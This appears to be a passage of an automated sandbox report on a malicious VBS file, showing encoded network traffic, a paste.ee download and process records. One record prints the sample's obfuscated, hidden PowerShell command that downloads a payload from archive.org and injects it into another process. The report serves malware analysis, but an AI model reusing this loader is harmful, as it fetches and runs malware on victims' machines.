                              2024-10-02 03:29:42 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                              Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                              2024-10-02 03:29:42 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                              Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                              2024-10-02 03:29:42 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                              Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                              2024-10-02 03:29:42 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                              Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                              2024-10-02 03:29:43 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                              Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.11 | 49706 | 188.114.96.3 | 443 | 7540 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-10-02 03:29:48 UTC | 67 | OUT | GET /d/nJcWp/0 HTTP/1.1
                              Host: paste.ee
                              Connection: Keep-Alive
                              2024-10-02 03:29:49 UTC | 1202 | IN | HTTP/1.1 200 OK
                              Date: Wed, 02 Oct 2024 03:29:49 GMT
                              Content-Type: text/plain; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: max-age=2592000
                              strict-transport-security: max-age=63072000
                              x-frame-options: DENY
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block
                              content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWGwbONuHnPp2O0zpHrpfcgwFhehl5ApDwastyasDI%2FdwcrFwdmbStIb8qohrGd8Cp9ys0AFyFrcnEMJ5DrQk7UEv3wEFEa4zCNnWIfhcQV0sV2tYS%2BbnCYWzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8cc19c391d63c336-EWR
                              2024-10-02 03:29:49 UTC167INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a
                              Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
                              2024-10-02 03:29:49 UTC1369INData Raw: 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 2b 51 72 50 67 36 44 6d 2b 51 6f 50 38 35 44 64 2b 77 6d 50 6f 35 44 59 2b 77 6b 50 45 35 44 4d 2b 67 69 50 67 34 44 47 2b 51 68 50 51 34 44 44 2b 67 67 50 41 30 44 2f 39 51 66 50 67 33 44 32 39 51 63 50 38 32 44 74 39 77 61 50 49 32 44 67 39 67 58 50 30 31 44 57 39 67 54 50 30 30 44 47 38 67 50 50 59 7a 44 75 38 67 4a 50 34 78 44 57 38 67 44 50 59 73 44 2b 37 67 39 4f 34 75 44 6d 37 67 33 4f 59 74 44 4f 37 67 68 4f 34 72 44 32 36 67 72 4f 59 71 44 65
                              Data Ascii: AjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABA+QrPg6Dm+QoP85Dd+wmPo5DY+wkPE5DM+giPg4DG+QhPQ4DD+ggPA0D/9QfPg3D29QcP82Dt9waPI2Dg9gXP01DW9gTP00DG8gPPYzDu8gJP4xDW8gDPYsD+7g9O4uDm7g3OYtDO7ghO4rD26grOYqDe
                              2024-10-02 03:29:49 UTC1369INData Raw: 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 67 6b 4d 41 4a 44 4f 79 41 6a 4d 6f 49 44 49 79 67 68 4d 51 49 44 43 79 41 51 4d 34 48 44 38 78 67 65 4d 67 48 44 32 78 41 64 4d 49 48 44 77 78 67 62 4d 77 47 44 71 78 41 61 4d 59 47 44 6b 78 67 59 4d 41 47 44 65 78 41 58 4d 6f 46 44 59 78 67 56 4d 51 46 44 53 78 41 55 4d 34 45 44 4d 78 67 53 4d 67 45 44 47 78 41 52 4d 49 45 44 41 77 67 50 4d 77 44 44 36 77 41 4f 4d 59 44 44 30 77 67 4d 4d 41 44 44 75 77 41 4c 4d 6f 43 44 6f 77
                              Data Ascii: 5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDUygkMAJDOyAjMoIDIyghMQIDCyAQM4HD8xgeMgHD2xAdMIHDwxgbMwGDqxAaMYGDkxgYMAGDexAXMoFDYxgVMQFDSxAUM4EDMxgSMgEDGxARMIEDAwgPMwDD6wAOMYDD0wgMMADDuwALMoCDow
                              2024-10-02 03:29:49 UTC1369INData Raw: 4d 6b 49 44 47 79 77 67 4d 41 45 44 39 78 67 65 4d 63 48 44 30 78 51 63 4d 34 47 44 72 78 41 61 4d 55 47 44 69 78 77 58 4d 77 46 44 5a 78 67 56 4d 4d 46 44 51 78 51 54 4d 6f 45 44 48 78 41 52 4d 45 41 44 2b 77 77 4f 4d 67 44 44 31 77 67 4d 4d 38 43 44 73 77 51 4b 4d 59 43 44 6a 77 41 49 4d 30 42 44 61 77 77 46 4d 51 42 44 52 77 67 44 4d 73 41 44 49 77 51 42 4d 49 41 41 41 44 67 48 41 47 41 41 41 2f 77 2f 50 77 2f 44 35 2f 67 39 50 4d 2f 44 77 2f 51 37 50 6f 2b 44 6e 2f 41 35 50 45 2b 44 65 2f 77 32 50 67 39 44 56 2f 67 30 50 38 38 44 4d 31 51 63 4e 41 58 44 76 31 67 4c 4e 57 52 6a 55 30 34 45 4e 4b 42 41 41 41 77 44 41 46 41 50 41 41 41 41 50 4d 7a 44 79 38 51 4d 50 41 7a 44 76 38 67 4c 50 30 79 44 73 38 77 4b 50 6f 79 44 70 38 41 4b 50 63 79 44 6d 38 51
                              Data Ascii: MkIDGywgMAED9xgeMcHD0xQcM4GDrxAaMUGDixwXMwFDZxgVMMFDQxQTMoEDHxARMEAD+wwOMgDD1wgMM8CDswQKMYCDjwAIM0BDawwFMQBDRwgDMsADIwQBMIAAADgHAGAAA/w/Pw/D5/g9PM/Dw/Q7Po+Dn/A5PE+De/w2Pg9DV/g0P88DM1QcNAXDv1gLNWRjU04ENKBAAAwDAFAPAAAAPMzDy8QMPAzDv8gLP0yDs8wKPoyDp8AKPcyDm8Q
                              2024-10-02 03:29:49 UTC1369INData Raw: 41 44 44 75 77 41 4c 4d 6f 43 44 6f 77 67 4a 4d 51 43 44 69 77 41 49 4d 34 42 44 63 77 67 47 4d 67 42 44 57 77 41 46 4d 49 42 44 51 77 67 44 4d 77 41 44 4b 77 41 43 4d 59 41 44 45 77 67 41 4d 41 41 41 41 42 41 49 41 46 41 4c 41 2f 67 2f 50 77 2f 44 36 2f 41 2b 50 59 2f 44 30 2f 67 38 50 41 2f 44 75 2f 41 37 50 6f 2b 44 6f 2f 67 35 50 51 2b 44 69 2f 41 34 50 34 39 44 63 2f 67 32 50 67 39 44 57 2f 41 31 50 49 39 44 51 2f 67 7a 50 77 38 44 4b 2f 41 79 50 59 38 44 45 2f 67 77 50 41 34 44 2b 2b 41 76 50 6f 37 44 34 2b 67 74 50 51 37 44 79 2b 41 73 50 34 36 44 74 2b 77 71 50 6b 36 44 6e 2b 51 70 50 4d 36 44 68 2b 77 6e 50 30 35 44 62 2b 51 6d 50 63 35 44 56 2b 77 6b 50 45 35 44 50 2b 51 6a 50 73 34 44 4a 2b 77 68 50 55 34 44 44 2b 51 51 50 38 33 44 39 39 77 65
                              Data Ascii: ADDuwALMoCDowgJMQCDiwAIM4BDcwgGMgBDWwAFMIBDQwgDMwADKwACMYADEwgAMAAAABAIAFALA/g/Pw/D6/A+PY/D0/g8PA/Du/A7Po+Do/g5PQ+Di/A4P49Dc/g2Pg9DW/A1PI9DQ/gzPw8DK/AyPY8DE/gwPA4D++AvPo7D4+gtPQ7Dy+AsP46Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99we
                              2024-10-02 03:29:49 UTC1369INData Raw: 56 44 64 31 41 58 4e 73 56 44 61 31 51 57 4e 67 56 44 58 31 67 56 4e 55 56 44 55 31 77 55 4e 49 56 44 52 31 41 55 4e 38 55 44 4f 31 51 54 4e 77 55 44 4c 31 67 53 4e 6b 55 44 49 31 77 52 4e 59 55 44 46 31 41 52 4e 4d 55 44 43 31 41 41 41 41 45 41 62 41 55 41 6b 41 45 44 37 78 49 65 4d 59 48 6a 7a 78 51 63 4d 36 47 44 73 78 59 61 4d 63 47 6a 6b 78 67 59 4d 2b 46 44 64 78 6f 57 4d 67 46 6a 56 78 77 55 4d 43 46 44 4f 78 34 53 4d 6b 45 6a 47 78 41 52 4d 47 41 44 2f 77 49 50 4d 6a 44 54 32 77 38 4d 4d 46 44 7a 75 77 45 4c 4d 6e 43 54 6e 77 4d 4a 4d 4a 43 7a 66 77 55 48 4d 72 42 54 59 77 63 46 4d 44 42 54 4f 77 38 43 4d 6c 41 54 47 77 34 41 4d 45 41 41 41 41 67 47 41 46 41 49 41 41 41 77 50 36 2f 44 38 2f 59 2b 50 63 2f 6a 30 2f 67 38 50 2b 2b 6a 73 2f 63 36 50
                              Data Ascii: VDd1AXNsVDa1QWNgVDX1gVNUVDU1wUNIVDR1AUN8UDO1QTNwUDL1gSNkUDI1wRNYUDF1ARNMUDC1AAAAEAbAUAkAED7xIeMYHjzxQcM6GDsxYaMcGjkxgYM+FDdxoWMgFjVxwUMCFDOx4SMkEjGxARMGAD/wIPMjDT2w8MMFDzuwELMnCTnwMJMJCzfwUHMrBTYwcFMDBTOw8CMlATGw4AMEAAAAgGAFAIAAAwP6/D8/Y+Pc/j0/g8P++js/c6P
                              2024-10-02 03:29:49 UTC1059INData Raw: 44 2b 30 77 4f 4e 6a 53 7a 59 30 41 46 4e 75 51 44 43 7a 55 2b 4d 63 4f 7a 6c 7a 45 35 4d 4d 4f 6a 57 7a 38 67 4d 6f 4c 44 74 79 49 69 4d 50 45 54 32 78 49 61 4d 74 46 44 5a 78 59 56 4d 42 46 54 45 77 6f 50 4d 76 44 7a 32 77 41 4e 4d 4c 44 6a 71 77 30 48 41 41 41 41 73 41 51 41 38 41 34 7a 61 2b 41 6c 50 59 30 44 77 39 41 62 50 6d 32 54 6d 39 38 59 50 41 32 6a 5a 39 38 56 50 59 31 54 55 39 34 52 50 4a 30 44 42 38 4d 50 50 70 7a 7a 79 38 38 4b 50 64 79 7a 69 38 77 48 50 43 6f 54 2b 36 49 74 4f 6e 70 44 51 35 73 70 4e 53 62 7a 73 32 55 55 4e 71 58 54 69 30 30 4c 4e 77 53 44 71 30 73 33 4d 46 4e 6a 41 79 45 75 4d 5a 4c 54 77 79 30 61 4d 67 48 54 73 78 45 45 4d 32 44 6a 37 77 49 48 4d 72 42 7a 4b 41 41 41 41 77 42 41 42 67 44 41 41 41 38 44 7a 2f 38 35 50 63
                              Data Ascii: D+0wONjSzY0AFNuQDCzU+McOzlzE5MMOjWz8gMoLDtyIiMPET2xIaMtFDZxYVMBFTEwoPMvDz2wANMLDjqw0HAAAAsAQA8A4za+AlPY0Dw9AbPm2Tm98YPA2jZ98VPY1TU94RPJ0DB8MPPpzzy88KPdyzi8wHPCoT+6ItOnpDQ5spNSbzs2UUNqXTi00LNwSDq0s3MFNjAyEuMZLTwy0aMgHTsxEEM2Dj7wIHMrBzKAAAAwBABgDAAA8Dz/85Pc
                              2024-10-02 03:29:49 UTC1369INData Raw: 33 66 66 61 0d 0a 61 78 41 57 4d 38 45 44 4e 77 55 50 4d 74 44 44 72 77 45 4b 4d 4f 42 44 53 41 41 41 41 67 43 41 42 51 43 77 50 68 2f 54 32 2f 73 38 50 44 2f 6a 75 2f 45 37 50 70 2b 54 6f 2f 6b 35 50 4f 2b 44 66 2f 51 33 50 6f 39 44 59 2f 63 31 50 4f 39 6a 52 2f 34 7a 50 32 38 6a 4c 2f 45 79 50 56 38 54 44 2b 38 73 50 6a 36 7a 64 2b 41 6c 50 4b 35 44 52 2b 34 6a 50 32 34 6a 4d 2b 63 69 50 59 34 44 44 39 73 66 50 76 33 54 33 39 6b 62 50 71 32 44 6e 39 6f 58 50 31 31 44 63 39 77 56 50 52 31 44 50 39 38 53 50 6b 77 54 39 38 63 4e 50 53 7a 54 7a 38 49 4d 50 6d 79 6a 67 38 38 45 50 4b 78 54 52 38 6f 44 50 4a 73 54 35 37 41 2b 4f 62 76 44 30 37 51 37 4f 64 75 6a 67 37 30 33 4f 34 74 54 62 37 45 31 4f 42 74 44 49 37 73 78 4f 57 73 7a 43 36 6b 75 4f 58 72 54 75
                              Data Ascii: 3ffaaxAWM8EDNwUPMtDDrwEKMOBDSAAAAgCABQCwPh/T2/s8PD/ju/E7Pp+To/k5PO+Df/Q3Po9DY/c1PO9jR/4zP28jL/EyPV8TD+8sPj6zd+AlPK5DR+4jP24jM+ciPY4DD9sfPv3T39kbPq2Dn9oXP11Dc9wVPR1DP98SPkwT98cNPSzTz8IMPmyjg88EPKxTR8oDPJsT57A+ObvD07Q7Odujg703O4tTb7E1OBtDI7sxOWszC6kuOXrTu
                              2024-10-02 03:29:49 UTC1369INData Raw: 71 4e 69 55 44 32 31 4d 63 4e 70 56 6a 46 30 6b 77 4d 72 4d 44 43 79 67 64 4d 48 44 41 41 41 77 45 41 45 41 43 41 37 4d 47 4f 56 63 44 2b 33 59 36 4e 41 5a 44 4b 31 73 57 4e 79 55 44 44 30 41 39 4d 7a 50 54 41 79 41 74 4d 79 45 54 37 78 6f 62 4d 6f 46 7a 4f 78 34 41 4d 63 42 41 41 41 41 44 41 45 41 42 41 41 41 77 50 6e 2b 7a 64 2b 6b 53 50 69 33 7a 68 39 6b 33 4f 42 70 54 64 35 6b 45 4f 35 69 7a 6b 34 59 33 4e 45 61 6a 6e 32 63 6a 4e 6b 55 54 38 31 45 38 4d 6e 49 6a 35 79 55 73 4d 68 4b 6a 6d 79 55 70 4d 6c 45 54 61 77 6f 4a 41 41 41 41 51 41 51 41 41 41 38 6a 35 2f 45 2b 50 43 37 6a 78 2b 55 71 50 42 36 6a 65 2b 55 6e 50 49 30 44 48 38 77 65 4f 51 6d 6a 68 7a 63 67 4d 67 46 44 4d 78 6f 41 4d 74 44 7a 4e 77 73 42 41 41 41 41 4d 41 4d 41 38 41 41 41 41 2f
                              Data Ascii: qNiUD21McNpVjF0kwMrMDCygdMHDAAAwEAEACA7MGOVcD+3Y6NAZDK1sWNyUDD0A9MzPTAyAtMyET7xobMoFzOx4AMcBAAAADAEABAAAwPn+zd+kSPi3zh9k3OBpTd5kEO5izk4Y3NEajn2cjNkUT81E8MnIj5yUsMhKjmyUpMlETawoJAAAAQAQAAA8j5/E+PC7jx+UqPB6je+UnPI0DH8weOQmjhzcgMgFDMxoAMtDzNwsBAAAAMAMA8AAAA/
                              2024-10-02 03:29:49 UTC1369INData Raw: 4d 48 44 54 77 77 77 4c 4d 32 43 44 73 77 6f 4b 4d 6c 43 7a 6e 77 6b 4a 4d 54 43 6a 6a 77 67 49 4d 43 43 44 66 77 63 48 4d 78 42 7a 61 77 55 47 4d 67 42 6a 57 77 4d 46 4d 4f 42 54 53 77 4d 45 4d 39 41 7a 4e 77 49 44 4d 73 41 6a 4a 77 41 43 4d 62 41 54 46 77 38 41 4d 4a 41 44 42 41 41 51 41 49 42 77 41 67 42 41 41 41 38 6a 2f 2f 67 2f 50 79 2f 54 37 2f 63 2b 50 68 2f 7a 32 2f 59 39 50 51 2f 6a 79 2f 51 38 50 2f 2b 54 75 2f 4d 37 50 74 2b 44 71 2f 49 36 50 63 2b 6a 6c 2f 45 35 50 4c 2b 54 68 2f 38 33 50 36 39 44 64 2f 34 32 50 6f 39 7a 59 2f 30 31 50 58 39 54 55 2f 77 30 50 47 39 44 51 2f 6f 7a 50 31 38 7a 4c 2f 6b 79 50 6a 38 6a 48 2f 67 78 50 53 38 44 44 2f 63 77 50 42 34 6a 2b 2b 4d 76 50 74 37 44 69 39 45 61 50 56 77 54 30 38 51 4d 50 39 79 7a 74 38 45
                              Data Ascii: MHDTwwwLM2CDswoKMlCznwkJMTCjjwgIMCCDfwcHMxBzawUGMgBjWwMFMOBTSwMEM9AzNwIDMsAjJwACMbATFw8AMJADBAAQAIBwAgBAAA8j//g/Py/T7/c+Ph/z2/Y9PQ/jy/Q8P/+Tu/M7Pt+Dq/I6Pc+jl/E5PL+Th/83P69Dd/42Po9zY/01PX9TU/w0PG9DQ/ozP18zL/kyPj8jH/gxPS8DD/cwPB4j++MvPt7Di9EaPVwT08QMP9yzt8E



                              Target ID:0
                              Start time:23:29:37
                              Start date:01/10/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs"
                              Imagebase:0x7ff7b6780000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:23:29:38
                              Start date:01/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                              Imagebase:0x7ff6eb350000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
